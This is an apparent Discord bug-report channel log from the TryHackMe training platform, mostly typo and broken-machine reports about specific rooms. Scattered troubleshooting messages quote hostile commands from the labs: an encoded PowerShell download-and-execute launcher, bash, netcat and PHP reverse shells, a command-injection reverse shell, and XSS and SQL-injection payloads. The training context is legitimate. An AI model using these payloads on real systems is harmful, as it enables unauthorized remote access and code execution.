#room-bugs
https://tryhackme.com/room/vulnversity
room stuck!
yes, it's stuck
https://tryhackme.com/room/uploadvuln showing 503 response error
That would be because the room code is uploadvulns, not uploadvuln
Room: https://tryhackme.com/room/tonythetiger
Task 6
Recommended room (https://tryhackme.com/room/zthlinux) is private and the link to the person returns 404
Is replaced by Linux Fundamentals Part 1 till part 3
Might be true but the URL is still in the room
Thanks, updating (:
Gave +1 Rep to @soft terrace
Room: https://tryhackme.com/room/linuxfundamentalspart1
In the new linuxfundamentalspart1, 2 and 3 the videos are private
new linuxfundamentals3 - text about crontab says "0 *12 * * * cp -R /home/cmnatic/Documents /var/backups/" - I am pretty sure that should be */12
also the last cron related question in Task6 (still linux fundamentals 3) says "How frequently does this crontab run" - I guess that should be "cronjob" and not "crontab"
ZTH: Obscure Web Vulns: Task 16 - grammar mistake
I think it's supposed to be "The interesting thing is"
https://tryhackme.com/room/linuxfundamentalspart1 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=kPylihJRG70
https://tryhackme.com/room/linuxfundamentalspart2 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=7Zt2Mp2IeBI
https://tryhackme.com/room/linuxfundamentalspart3 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=bwgaZCb2ft8
https://tryhackme.com/room/linuxfundamentalspart1
Task 7 I recommend you add something that explains how the & operator is actually used - not being that familiar with it myself I had to experiment to see how you actually use it. A beginner wouldn't know that you're supposed to put it at the end of a command, like my first instinct was to "& command text"
Thanks -- will update after some lunch (:
Gave +1 Rep to @lime yarrow
Good find. Will take a look ty (:
In Linux Fundamentals Part 3 Task 7 you can't try downloading and installing sublime text because no ROOT access on this task
Well NGL that's a weird answer format
It was already discussed in #room-help and #room-hints
The task is there as an example and it doesn't expect you to install software onto a machine
Re-wrote the question to make this better -- thanks for letting us know!
Gave +1 Rep to @small forge
Not needed
There seems to be a bug with the WebOSINT room - the republicofkoffee.com domain no longer has its country listed as Panama - instead it is Iceland. The privacy protection service seems to have changed.
Hey guys, is anyone else having issues with VMs? I have asked another friend to try the same room and he is also having issues loading VULNVERSITY
It was working for me 8 hours ago before bed, but this afternoon I can't connect with either the attackbox nor my own Kali VM
as in the tryhackme.com page, or webservers on VMs in rooms? @terse stump
I've been having issues which another friend said he was replicating, but the connection is slowly getting better it seems
Can't understand it. Sometimes it just loads forever, other times it connects, yet a port scan and gobuster scan both work.
And maybe the room is updated since the video was posted, but the method which is described for using intruder does not give a positive for phtml extension to work, doing so manually on the site does give the confirmation, however. Quite frustrating.
is the metasploit room working properly
i am not able to gain access to the machine even after doing the exact commands
#room-help would be better
in linux fundamentals in task two in line 15 you write: SSH allows us to remotely execute commands on another device remotely. I think one of the remotelys can go. really nitpicky, but hey
@dusky junco ^
Trying to do the linux fundamentals rooms, just released, when i click start machine the in browser session didn't appear.
and no credentials are provided to ssh in
that first machine should boot up where the attackbox would usually be, no ssh needed
Yeah, some people are just getting a blank screen there though
Didn't appear at all?
nope
Along the top of the room, near the title, is there a "show split screen" button?
Above that
Near the room title
Around there
CMN, I looooove this formatting with the callouts like that
oh derp
Nah, it's a weird thing
I didn't see that button
If you minimise a VM, it keeps that state
It's weird and annoying and I'd class it as a UX/usability bug
Have made sure staff are aware
Gave +1 Rep to @eternal summit
Task 2 cc @dusky junco
This should be plural, not possessive. No apostrophe.
Fixed. Thank you for reporting.
Gave +1 Rep to @jolly kelp
tyty nice catch
Working through it with pedantic eyes RN for you
it made quite a few rounds of eyes but yeah -- can never have too many so I appreciate it
good call (:
You can't navigate into the file
You can navigate into the directory, which would make more sense
I see
Also probably missing a step to go back home after that question
because the next task assumes you're in ~
I'd also add just a quick sentence about how grep is a lot more powerful and is designed around regular expressions
@dusky junco Also highlighted below are the "passwd" and "shadow" files. These two files are special for Linux as they show how your system stores the passwords for each user in encrypted formatting called sha512. Sha512crypt is different and that difference is really important IMO.
I'd ditch the word encrypted and say hashed.
Common Directories (task 6), etc section
/tmp I think it'd be nice to get the word volatile in there somewhere if you're going to compare it to RAM
Linux Fundamentals 3, Task 4, you start talking about Wget then change topic, then later swap back. It'd make sense for them to be all together
Task 5
Would make sense to say how we send those signals with kill?
Also task 5, is it just me or does the font size change randomly?
It's the ^Z, the T is just part of the output
Task 6 - Should probably mention system crontab vs each user's individual crontab. Sometimes important for privesc etc.
@dusky junco I'm so sorry
I hope this hasn't been reported 1000 times, I searched and didn't find. Linux Fundamentals part 2 Task 5
"important" file is accessible by tryhackme user when I think only intended for after su'ing to user2
Thanks. VM is cloning
Gave +1 Rep to @fast plank
In the room "MAL: Researching" on Task 4:
I get the same error still, any workaround for it?
hi so i was doing the osqueryi room and executed everything in order but it errored out!
Hi. Sorry about this. I'll look to getting a new sample submitted today and replaced within the room
Linux Fundamentals 2, should the important file be world readable?
Room: https://tryhackme.com/room/rppsempire
Task 8
picture is not displayed
also in task 8. Should be WinPEAS and not WinPEASS
Fixed. Thank you for reporting.
Gave +1 Rep to @soft terrace
Hi admin. Finished https://tryhackme.com/room/linuxfundamentalspart1 today. Task 7: Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be
echo tryhackme >> passwords is correct.
echo tryhackme >> passwords123 is also correct.
Pls verify the bug. Thank you
Answers have some tolerances, THM will accept it I guess. but echo tryhackme >> passwords123 is not correct answer.
Noted. The wrong answer was my initial answer. System indicated it was "correct". So I reset the room and keyed "echo tryhackme >> passwords".
There's a bug in Osquery > Task 5 Creating queries.
The question asks What is the query to show the username field from the users table where the username is 3 characters long and ends with 'en'?
SELECT username FROM users WHERE username like '%en';
My code above went through, but it didn't take into account that the username needs to also be 3 characters long.
My code marked as correct would only satisfy the username as long as it ends with 'en'.
Also, nowhere in the Osquery documentation did it contain any hints/tips on what syntax to use. I had to get help from the #room-hints channel to figure it out. It would've been best to suggest going to w3schools.com or something similar. The Osquery documentation assumes you are already versed with SQL (which I wasn't), which made it a useless resource.
This is due to answer variance. Not a bug.
Solved and answered in the #site-bugs channel
more of an update than a bug: on Kenobi, task 3 question 2, there's 4 now as of two days ago
please can somebody help ?
that might be a #room-help question?
oh ok i asked it here because it was erroring out every time so i thought it was a bug in the room itself
Hello, I am doing the "MAL: Malware Introductory" room. For task 7, check MD5 hashes on vlc, aws and netlogo, there are no hashes. I pasted and installed on the VM the 6.0.0.34 version of hashtab, it works now. There is a problem with the installed version.
Overpass3 - Can't upload ¯\_(ツ)_/¯
I'm in the right directory. Restarted the machine. No success. Tried from attack box. No success..
Not a bug. Try somewhere slightly different.
dammit lol.. Will try, thanks
Gave +1 Rep to @eternal summit
Thanks will get this updated this weekend
Gave +1 Rep to @low marsh
Broken Link
Location URL: https://tryhackme.com/room/owasptop10
Task: Task 2 - Accessing Machines
Issue: The word "here" found in (Follow the guide here to connect using OpenVPN.) sends you to https://tryhackme.com/404
anyone knows why i can't access the machine for Linux fundamental part 1
Thank you and bless 
Gave +1 Rep to @dusky junco
Gd day, anyone having issues entering metasploit room? i can't access it. page forever loading
Hi, I was having the same issue but realized that when you click setting in file hashes it lets you select hash type. Click the box and the hashes should appear. Hope this helps.
I'm swapping out the VM to get this auto-selected right now (: thanks for helping out cc @static holly
Gave +1 Rep to @crimson maple
Tried that, didn't work for me. When I clicked the small box, the dropdown didn't show me anything
If I found a typo in one of the rooms, is this the place to post?
yess please (:
In the "Linux Modules" room, under sed. There is a "be" missing. "to BE executed"
Could you share the URL to the room please? I'll update this now if so π
Awesome ty
I think one line below also there's a "the" missing..
Updated both: To add a script/command that needs to be executed with the / the string pattern
Thanks for reporting @obtuse musk
Gave +1 Rep to @obtuse musk
In the Linux Modules room under "sed", second question, there's a "the" missing right before "3rd and 4th".
https://tryhackme.com/room/linuxmodules
You are trying to solve task 5 Vulnerable Startup: Broken Authentication 2 inside task 4 Vulnerable Startup: Broken Authentication. The challenge title on your screenshot says Broken Authentication, but it should say Broken Authentication 2. I tested the challenge again on THM and can confirm that it works. The design of it might have been confusing or weird, and I will take that into consideration for any future rooms
Doing Eternal Blue and I found some ... bugs
if we can call them that
RHOST not RHOSTS
Oh nvm
Problem was with the exploit/windows ... It's windows 7, not 8
server is run on windows 7
Also, next task shows us how to upgrade from Shell to Meterpreter, but I got a Meterpreter shell directly
Thanks for the feedback! I'll try again and pay more attention to the title.
Gave +1 Rep to @sterile crater
did anyone else lose their progress in the linux fundamentals room?
Pretty sure it tells you to get a command shell first, for that reason
(It certainly should: I edited it a few months ago)
MSF made Meterpreter the default for it a while back
The rooms got reworked to be more beginner friendly.
See: #announcements message
good2know! thanks mate
Gave +1 Rep to @soft terrace
Not really a bug, but just an error I spotted in Task 3 of John The Ripper room
in Linux Fundamentals1 when i press "Start Machine" it starts browser machine that gets connection error so i can't do anything in the box
Not really a "Bug" but I found a typo in a beginner room that could cause some confusion to beginners like myself.
Found another typo john the ripper room task 6
https://tryhackme.com/room/johntheripper0
etchashes.txt is the download file for this task.
"python hash-identifier.py" should be "python hash-id.py" as per the wget command above it.
Don't know if would be classified as a bug or not
But the Windows machine in room Blue Teaming The Grinch strikes again! is supppppper slow
I am using RDP via Windows, I have selected the closest VPN server, disabled all the graphic enhancement options when connecting via Windows RDP
and it's been 15+ minutes but the machine is responding very very very slow.
Half of the time I get a blank screen.
Is it normal, or it shouldn't happen like this?
facing this issue only for Windows machine, linux boxes work like a charm.
I also got a Windows update pop-up.
Hello, I'm on the Nmap room Task 12 NSE Scripts Searching for Scripts. And I'm stuck on the second question. It seems like there's supposed to be a script it gets linked to, but I don't see a script it should be referencing.
Fixed. Thank you for reporting.
Which one is correct?
@stark torrent is correct hash-id.py
Fixed.
@glad badger Did you see the other one I mentioned in the same room?
Nevermind, I needed to read through the script from the first question. Missed the context there.
Fixed too.
Room: https://tryhackme.com/room/adventofcyber2
Task 10
Error: clicking on "intercepting a request" leads to https://extratechtalk.in/intercept-http-requests-using-burp-suite/ which can't be found anymore
Better try Haiti instead of abandoned hash-id or hash-identifier https://noraj.github.io/haiti/#/why
Better try NameThatHash
And understand the fundamental flaws with automated hash identification tools
yeah there are more emoji in the Readme
I was having a look over some of the old rooms and noticed that the https://tryhackme.com/room/kali room has steps that tell you about using the machine in your browser, but they refer to an "Access in browser" button in the "Active Machine information" panel, whereas now you need to use the "Show Split view" button at the top of the page, that is next to help and options.
Woah that's an ancient room
819 days, yup, dunno if anyone uses it anymore, but it's shown me https://tryhackme.com/my-machine which i didn't know about, so that's a plus
might be worth a revamp
Certainly should be private now
Room: https://tryhackme.com/room/blaster
Task 4
Windows Defender catches the powershell script
...the powershell script?
you run the exploit, it gives you a command to type on the target machine's command prompt
something like this: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAA...
That's... Probably not the intended exploit
At least, you certainly don't need that.
I would certainly not class this as a bug.
If you're getting picked up by defender, you're doing it wrong.
urgh can't paste pictures
ok so, I followed the instructions pretty closely and got picked up by defender
I did it once more following the tutorial video, still got picked up by defender
I used multi/script/web_delivery
set the target to PSH
set the payload to windows/meterpreter/reverse_http
set the LPORT to 443
set LHOST and SRVHOST to my IP
then run -j
got the command and just copy-pasted it into the elevated command prompt; nothing happens, the window just disappears
tried again without the -w hidden, and I got
IEX : At line:1 char:1
+ If($PSVersionTable.PSVersion.Major -ge 3){ $GPF=[ref].Assembly.GetT ...
+
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:282
+ ... edentials;};IEX ((new-object Net.WebClient).DownloadString('http://10 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
At line:1 char:1
+ function m54v {
+
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Hi guys, want to report a possible bug for https://tryhackme.com/room/linuxfundamentalspart3 .
The task is to find the IP address of the user who visited the site from the Apache access logs. However, the provided user itself does not have sufficient permissions to view the file. Not sure if my approach is wrong, but I will attach the screenshots below.
It seems I can't post images, so I have uploaded to imgur. https://imgur.com/a/0s9RxeL
it's not a bug, there's two log files
read the other one
and verify with the bot to be able to post screenshots in the future
!docs verify
Ok, I will try that out. Sorry for missing out the verification process =/ thanks!
no problem
Can someone please check, if there is a problem with "Daily Bugle", running sqlmap and never seen running it so slowly - practically doesn't even work. Two-three new lines in one hour. Also when clicking on anything the load times are enormously long. I know it's not a problem with my internet, as all other sites are running fast (on fibernet).
@twin tapir solly for ping but https://offsec.red/mimikatz-cheat-sheet/ this site in ur post exp room doesnt work (postexp room)
task 8
can anyone help me in room roysrus i'm unable to open webserver on port 1234
i can open other server on port 80
try some other port like 8080
Hi ! I think we identified a bug in "Blaster" room. When following the steps in the last task, executing a powershell payload generated by MSF for a meterpreter, our shell is killed by Defender (which I understood is supposed to be deactivated).
Hello, in the Content Security Policy room, in task 7, the first attack, I tried several payloads that should be working, but when I receive the request in my webhook, the cookies are not showing. I even tried the payload from the writeup (which was similar to mine), and still not working. Does someone know the cause for this problem?
In the newest room (Linux server forensics) on task 2 and 4 the text isn't "wrapped" in the "viewing area". The text is not fully visible basically, I don't know if it is like that on any other tasks as I've only done up to task 4
Upload Vulnerabilities, Task 6, Extension Validation paragraph: "so actually don't mean much" <-- incorrect grammar
Should be "so it actually doesn't mean much"
Hello! Does anyone know why in the DVWA room, in the Command Injection vulnerability, even on Security Level Low, it won't spawn a reverse shell with 127.0.0.1 && nc -e /bin/sh <IP> <port>? I have already tried with nc -e /bin/bash, and I have tried changing the && to ; and |, but nothing works. All the examples I saw from DVWA spawned the reverse shell in a similar way.
@jolly kelp I would say that with the plural extensions and the use of "they" (plural) to refer to them before, "don't" makes most sense there. Neither of them really feel right though
It's saying that the file extensions don't mean much, rather than the whole topic doesn't mean much -- albeit amounting to the same thing
Netcat with the -e option very very rarely works
The -e option is specific to one version of netcat, and there's several
Huuum
How do you recommend to proceed? As I said, all the writeups I found use nc -e
Are they writeups for the THM room?
It won't be a bug with the room.
Try different reverse shell payloads.
seems to just be Task 2 and the start of Task 4 that has this text wrapping issue
Anyone else having a problem loading into the Vulnversity room?
Seems to be more of a site bug than a room bug. Try clearing cache and force-reloading
So I did the clear cache and reload but still stuck on loading
Yeah, I'm not sure what else to try or what's causing it. I think it's a known issue, but I don't know the cause or a fix. Sorry :/
Don't worry about it but thanks for trying to help me
Hello, just thought I'd let you know that the attackbox isn't able to complete Task 3, Enumerating SMB in the Network Services room on the complete beginner path. When running enum4linux on the attackbox targeting the target system, it throws errors that sound like missing dependencies. When using the web based kali machine instead everything works as expected.
if you are on windows sometimes the rooms don't work (infinite loading)
you can do it from linux
i'm using windows as main and when i met this bug i go in linux and see the room there
Room: https://tryhackme.com/room/linuxserverforensics
Task 2
Error: Sentences are not properly displayed
https://tryhackme.com/room/linuxserverforensics - Task 4 - Most of the intro text is cut off -
Are you using Chrome? @soft terrace
Firefox
Interesting. It cuts off in Chrome as well. It displays fine in Safari, but still strange word-splitting.
I'm using Chrome
Shouldn't those be some form of standard text element for every room to maintain a consistent style?
The difference in boldness should probably also be a concern :p
to be exact
Is anyone else having issues with the Rust room? I haven't been able to load it for over a month
Just sits there with the little circle spinning and never loads anything like the questions etc..
it's a known issue unfortunately
I don't know if there's a known fix
@eternal summit or @green steppe might know?
Hi it's a site issue
@amber flint site broke plz fix
Get help
love your answer lmao
brb calling papa ashu /s
name a better duo than rust and breaking things
Cry and Spooky
Machine in Linux Fundamentals Part 1 (https://tryhackme.com/room/linuxfundamentalspart1) not starting
Disk Analysis & Autopsy
(https://tryhackme.com/room/autopsy2ze0) not starting
anyone else getting error 504 - gateway timeouts when trying to start machines ?
yeah currently under investigation - #site-support message
Not a linux master but are the underlined in Red supposed to be 'x' instead of 's'?
well, it's talking about suid so I don't think so
ok I get it thank you
Gave +1 Rep to @oak mica
Room: https://tryhackme.com/room/beginnerpathintro
Task: 2
Issue: Typo in the right side web page for "Target Hack", 2nd page: (to monitor stores' temperates) should be temperatures
On the 3rd page, "Targets" should be possessive ("Target's")
for some reason i cannot open the module in the cyborg room, it shows i have 0% completed the room but the check marks in the task are green and i cannot see any content on task 2
i've tried to open the room with other browsers the result stays the same, and this problem only occurs with my acc
the button is non-responsive for this room, clicking yes please doesn't do anything
oh, does indeed sound like a bug then
maybe but it did occur with my acc only, i've asked so many people who did or didn't do this room, but everything seems fine for them
yeah it loads fine for me, still a bug I guess
hmm
i got some issues with the juice-shop.herokuapp.com site. I can't make a ping and because of that it is impossible to make Burp Suite work.
the "learn rust" room is not working, please solve this issue
That's not TryHackMe.
Pings are also independent of the web application
Mimikatz part (Task 21) in the wreath room https://tryhackme.com/room/wreath
Does this mean the network has to be reset?
Hello, the Rust room is in infinite loading (https://tryhackme.com/room/rust)
does anyone manage to access it?
same
+1
Should be working now.
Serving Files From Your Host - WEB
Ubuntu machines come pre-packaged with python3. Python helpfully provides a lightweight and easy-to-use module called "HTTPServer". This module turns your computer into a quick and easy web server that you can use to serve your own files, where they can then be downloaded by another computing using commands such as curl and wget.
typo on last line should read 'computer'
Room: linux fundamentals 3
mod mentioned that it is correct
No
Reporting it in #848213138565365760 would have also been fine
But cc @dusky junco ^^
Not a bug but feedback regarding
Room: https://tryhackme.com/room/linuxfundamentalspart3
Task 6
Many people are confused with the frequency question of the crontab.
Could you add a @ in the answer format so it's more clear how the answer should look like?
That's not possible
I am at linux fundamentals P1 room, and i am getting connection error while starting the provided attackbox in that room.....
- it's not the attackbox, it's a different machine
- it's a known issue atm
Ok
So, is there any workarounds?
And sorry, i am new at tryhackme
You'll need to wait for it to be fixed
K
attacktive directory room, not really working when trying to install kerbrute, the standard attack machine seemed better than the kali one, but still terminal crashes and resets to being brand new like when you start the instance up
I'm doing Brainstorm room, but I have an issue with running chatserver.exe on my Windows VM with Immunity Debugger and mona. It's a 16-bit executable and ntvdm.exe seems to bug so I can't run chatserver.exe. I didn't find any working fixes. Maybe anyone here has a clue
yes thanks
Gave +1 Rep to @glad badger
thx ill check that out
Gave +1 Rep to @eternal summit
jep it runs now thx a lot
Gave +1 Rep to @eternal summit
just seems like incorrect grammar; room https://tryhackme.com/room/nax
Fixed, thank you for reporting
Gave +1 Rep to @drowsy portal
Room : common linux privesc
task 4
every time i click this button, it says "undefined" and my antivirus detects a RCE attempt
Yeah. It's a false positive with BitDefender.
It's crazy it detects it as RCE too, because windows doesn't have /etc/passwd
It's not normal. It's BitDefender being bad at its job.
I may be crazy or not understanding. I am doing Vulnversity, and no matter any attackbox i open, when scanning, squidproxy is never there or running. nor is the webserver on 3333 there. so i cannot move onto task3.
!docs verify
Follow those steps, and post a screenshot of what you're doing in #room-help
Sorry for the late reply. i will do that now
I ran into an issue with steelmountain room for a while. sc in powershell was triggering set-content and not service-control as the room suggested. Thankfully I noticed that files were being created and was able to complete the room by using service-control.
room https://tryhackme.com/room/catpictures it's pinging just fine but i can't access anything
ftp, or the webserver
Might also want to ask in #850434990978105384
got the webserver working, after i leave the room xD..
Hi, Seems there is a typo in the room https://tryhackme.com/room/introtox8664, for the task 4, it mentions aaa while AFAIU it should be aa. (There is also an "empty" command to be run)
Hi
in https://tryhackme.com/room/malstrings the actual amount of total transactions doesn't match anymore. The total amount seems to still be going up.. The right answer for the 1st question in task 4 is one below the actual one on this site: https://live.blockcypher.com/btc/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94/
Another little typo in Task 5: The next instruction is a jle which is going to check is the value is var-ch is less than or equal to 8. should probably be The next instruction is a jle which is going to check if the value of var-ch is less than or equal to 8.
Hi thank you ((: I'll get this updated and archive it to prevent it in the future
Gave +1 Rep to @obtuse musk
I'm doing the filter evasion section of the Cross-site scripting room, and challenge 3 doesn't seem to take my answer as correct even though it is.
<img src="blah", onerror=alert("H"+"e"+"l"+"l"+"o") / >
I tried the solution from the writeup, which does work, but is not the same way I did it. Not sure if I was too impatient to get the answer popup, but yeah.
TechIT room is always stopping, my rev shell is not receiving data from the room
Is that a public room?
Game Zone room server crashes when you do the manual SQL injection
with ' or 1=1 -- -
and it doesnt boot back up, so you have to terminate and reboot it
seems to work on attackbox, so I wonder whats up with my WSL Kali now
I did some other boxes previously and in one walkthrough entered some ufw command that I was not even sure what it did to help me advance, since then I've removed ufw from my system
but I cant seem to access shit now
ifconfig shows many tun interfaces, more than there was previously
like 4, zero through 3
#site-support would be better as this isn't a bug with the room
gotcha
found the issue, I had 2 openvpn processes running, oops
Hi i think the authenticate room has some errors with the json web token exploitation. i have been trying to follow the walkthrough for the past hour and the only token that works is the one provided for admin, if you try and get user2 it keeps giving an error
Room: https://www.tryhackme.com/room/xss
Task 9
Image is not properly displayed
https://tryhackme.com/room/networkservices
telnet is not running any command (ping)
.RUN ping ... is not showing anything, server hangs without any further message
I've added it to the list. π
In the Powershell Scripting room, the first question asks for the location of "interesting-file.txt", when the file name on the machine is interesting-file.txt.txt
fair warning, the same will happen for different files throughout the room, be on the lookout
good to know, just spent like 20 minutes trying to figure out what was wrong with my syntax because I was using the full name of the file, until I just decided to *.txt
same here
In the Mal: Strings room task 4, the # of the btc transactions has gone up by one
Resolved, thanks for reporting (:
Gave +1 Rep to @next hare
No prob bro beans thanks for the room
Much appreciated 
Room: https://tryhackme.com/room/thatstheticket
Bug: Typo
Sentence: "We not not recognise that email"
@tepid moon thought it'd be best to ping you.
A Not Not is like an At-At from The Empire Strikes Back.
well this is fun, I am not allowed to login as admin in Corp, I have tried both "runas" and RDP, runas tells me there are some issues with the admin user and running RDP tells me to change the password.. but after changing the password it crashes on me...
Didn't crash on me last time I changed the password. The password's expired which is the issue
Yup, I reset the box and it didn't crash after I changed the password.
The SMB server on the Attacktive Directory seems to be malfunctioning
You should not have four forward slashes?
It's either //ip//share or \\\\ip\\share when you're on Linux
I think this is a problem with the task question itself. I tried verifying it with my browser by sending a get request and the server responded same what nessus reported
hi, I'm not sure if this is the right place to request support, but I am having an issue with connecting to a windows machine using xfreerdp. [12:37:15:630] [1955:1956] [INFO][com.freerdp.client.common] - Network disconnect!
I've restarted the machine, and it still gives me the same issue.
My bad, I always have those confused
https://tryhackme.com/room/torforbeginners <danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion> should be https:// and not http:// as stated in the description
http timeout while https works
http works as well. If it times out, change the circuit a few times.
ok so np
Just some feedback - In the XSS section of the top 10 OWASP room, and the XSS room itself, the XSS playground website on the machine you deploy is agonizingly slow. It seems to get stuck trying to access jquery and some stuff on cloudflare when it presumably doesn't have internet access, just hangs for up to a minute whenever you change pages. Same issue in the machine for Task 7 (Broken Authentication), it hangs on "Looking up maxcdn.bootstrapcdn.com" for up to a minute with every click on the website
You're trying to sign in with a microsoft account
Set the username to .\wade, not MicrosoftAccount\wade
Let me try this
Not working
Same error
Try doing it inside Kali?
xfreerdp /v:10.10.183.0 /u:wade /p:PUT_THE_PASSWORD_HERE /dynamic-resolution +clipboard /cert:ignore
Obviously subbing in the correct password
Trying again
I think ignoring the cert worked.
That'd help. Did that work?
Thank You!!!
Gave +1 Rep to @obsidian kiln
Np
In the room https://tryhackme.com/room/dllhijacking, task 1, i think it is 'print spooler'
Hi there. For the "rpmetasploit" room, the first Q&A option in task 7 no longer seems to be valid.
Fixed. Thank you for reporting.
Gave +1 Rep to @strong kelp
The first sentence in https://tryhackme.com/room/rppsempire does not make much sense.
I think it should be 'Starkiller uses a listener and a stager to create an agent. The listener does exactly as it sounds like ...'
RDP doesn't seem to work in https://tryhackme.com/room/postexploit. Other rooms work fine, and SSH works. Resetting had no effect.
@sleek jay https://tryhackme.com/room/tmuxremux
it lacks the word more (task 2)
This is @tardy lynx room.
Thank you!
You helped him?
oh actually found it from here https://tryhackme.com/p/0day
in the created room tab
Yeah it says I'm a collaborator
impostor
I'm sure it was probably reported (especially looking at the room grade), but due to a few problems https://tryhackme.com/room/bof1 is quite painful: I used it as a starter for buffer overflows (after landing in the https://tryhackme.com/room/bufferoverflowprep via the Offensive pentesting path) as it's advertised, and as it's rated easy. A clear example is the fact the shellcode is not suitable for this room (or did I miss something?) it's really a pain, having a working shell code, or at the very least a clear mention that this shellcode is not expected to work would help so much getting the basics. Hopefully https://l1ge.github.io/tryhackme_bof1/ was quite helpful to fix the missing bits and complete alone the last task, but without it this room seems quite difficult for newcomers to buffer overflows. Certainly not an easy one. It's a bit sad as it still contains interesting and fun content.
I believe that I might have found a room task that might be accepting a lowercase character when it should in reality only allow for an uppercase character. If that's the case, who should I contact to possibly rectify it?
THM answer fields allow for some tolerance, so it's not a bug per-se
In the room Ra, when trying to run spark, the spark program crashes every time. Impossible to get past on my end.
Might be an issue with Java on the box, I'll conduct more testing later and try replicating the issue.
In the Room Nax, the answer of Q8(Metasploit module name) is old. The name has changed.
Hello everyone, room regular expressions task 4 question 10 accepts only a wrong answer (.?\W+ instead of .?\S+) (sorry for the spoiler)
Tryhackme.com/room/catregex
Answer tolerance, not a bug
Was there a room for like typos, ?? I guess feedback room would have been better,
It's THM's answer tolerance. Refresh the page and it will go away.
Typos in rooms count as bugs.
hello
Hello
total 28
drwxr-x--- 4 www-data www-data 4096 Jun 3 2020 .
drwxr-xr-x 3 root root 4096 May 18 2020 ..
drwxr-x--- 2 www-data www-data 4096 May 21 2020 css
-rw-r----- 1 www-data www-data 17 May 22 2020 drpepper.txt
-rw-r----- 1 www-data www-data 1723 May 26 2020 evilshell.php
-rw-r----- 1 www-data www-data 2200 May 21 2020 index.php
drwxr-x--- 2 www-data www-data 4096 May 21 2020 js
what's the output for this cat evilshell.php
maybe it's your keyboard layout
copy my message
Hey guys, there is a problem with the room 'Fowsniff' (at least for me). According to the room, the root should be done editing 'cube.sh' and log again. The problem is editing it, in many ways, with different shells, doesn't work at all.
using netcat?
Whichever works
What type of payload are you putting in cube.sh?
And do you know where root is executing it?
yes
i know
i tried python's and bash
i send you
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
then the normal one suggested in the room
try bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Did you replace the IP with your own VPN?
Because I know it's not 10.0.0.1
i try, i log in again
yes, vpn works
also the shell works
if i do from the dir ./cube.sh
it works
the problem is that doesn't start if i log in, as should be
Not if you login, it's supposed to happen when root logs in.
ok
any reverse shell doesn't work, tried bash and nc
php -r '$sock=fsockopen("<IP>",9001);exec("/bin/sh -i <&3 >&3 2>&3");'
yeah it works
Ayee
thanks @sleek jay
Gave +1 Rep to @sleek jay
No problem
i can confirm everything is working fine, i just completed the room. just one thing: simple bash reverse shell didn't work. needed to provide it as an argument in sh -c or bash -c . why is that @sleek jay
Room: https://tryhackme.com/room/linuxfundamentalspart3
Umm... >, >>.. These are not pipe operators... ???
IO redirection symbols maybe,
Redirection operators
i got the first question correct lmao , and the text above say that im wrong.
why answer tolerance exists in questions like this ???
The room creator has no control over it.
hello everyone i think there is a problem with room named internal
wordpress isn't loading completely
this is how it looks
the resources are in internal.thm which is inaccessible
Guys anthem vm is not working, i waited 10 mins for it to boot up but it doesn't work? Any suggestions?
@night viper
Read the bit at the start. It's usually useful
And maybe don't try hard rooms if you're not familiar with vhosting
-ban @wheat fractal steam scambaiting
Banned Dα΄Κα΄#3867 indefinitely
where to report broken link ? http://tryhackme.com/room/networkservices
Oh my gorsh he banned dorkstork
Is there a bug in OWASP Top 10 reflected XSS machine?
on sending a payload with js code to display machine's ip address in an alert, no flag is displayed
having lots of problems in the room: Upload Vulnerabilities... most of the pages dont ever load.. i was only able to complete half the room.. the machine works.. but i have to keep reloading 20 times per page to work..
Sounds like a VPN issue
Make sure you have setup your VPN connection correctly https://tryhackme.com/room/openvpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (that don't start with "grep" or sudo), do the following steps
Type sudo killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
i'll look into it.. thanks for the reply.. im kinda new in this world
We all start somewhere :). Don't be afraid to ask questions, that's what this discord is for
Hi how you
how are you*?
I'm having issues with this room EasyCTF
I'm trying to execute an .py file but it gives me this error
that's a better question for #room-help or #room-hints . This channel is for bugs in the rooms
ok I'll go there
Hey! My anti-virus is flagging the first Network Services room pretty heavily, is that normal?
Avast?
Yup!
Yeah, some AV will report issues with THM, as a lot of rooms involve malicious code in various ways. You can whitelist/allow the tryhackme.com domain if you want. You're taking a bit of a risk there, but none of the rooms on THM are designed to hurt you
That makes sense. Appreciate the help!
Hey hi, I've somehow managed to achieve NaN time left on the AttackBox. Just send me a DM if you like to know the IP on the machine in question.
bug in burp suite, correct answer check skips last letter in the string
title is owasp juice shop
task 7 question 6
Answer tolerance, not a bug. Refresh the page.
https://tryhackme.com/room/kenobi
ProFTPd things near last question, mounting doesnt show up anything, double checked the steps (copying, mounting) but still can't find the rsa key
Not a bug, user error
Are you on the attack box or the machine they asked you to spin up?
They are separate vms
attack box
You'll have to spawn the vm and ssh into it
Be nice, it's an honest mistake fluff
before i even learn how to do that?
Fundamentals 1 spawns in split view
how to ssh into a vm nd wot u said
Im dumb
Ill be honest
I don't know anything thas y im tryna learn
Dont worry, lemme go to the room
Thanks g
@astral quartz Power down attack box, revisit the room after it's down. Click the "Start Machine" button in Task 3 of the room
This will spawn a correct machine to finish the tasks
Thanx g
I am nice! 
Hi, now im doing Linux Fundamentals Part 1
and i cant run the machine. Any one help?
!docs verify
Another Czech nice
Im not clicking on that link
@dusky junco ^
Works fine for me though
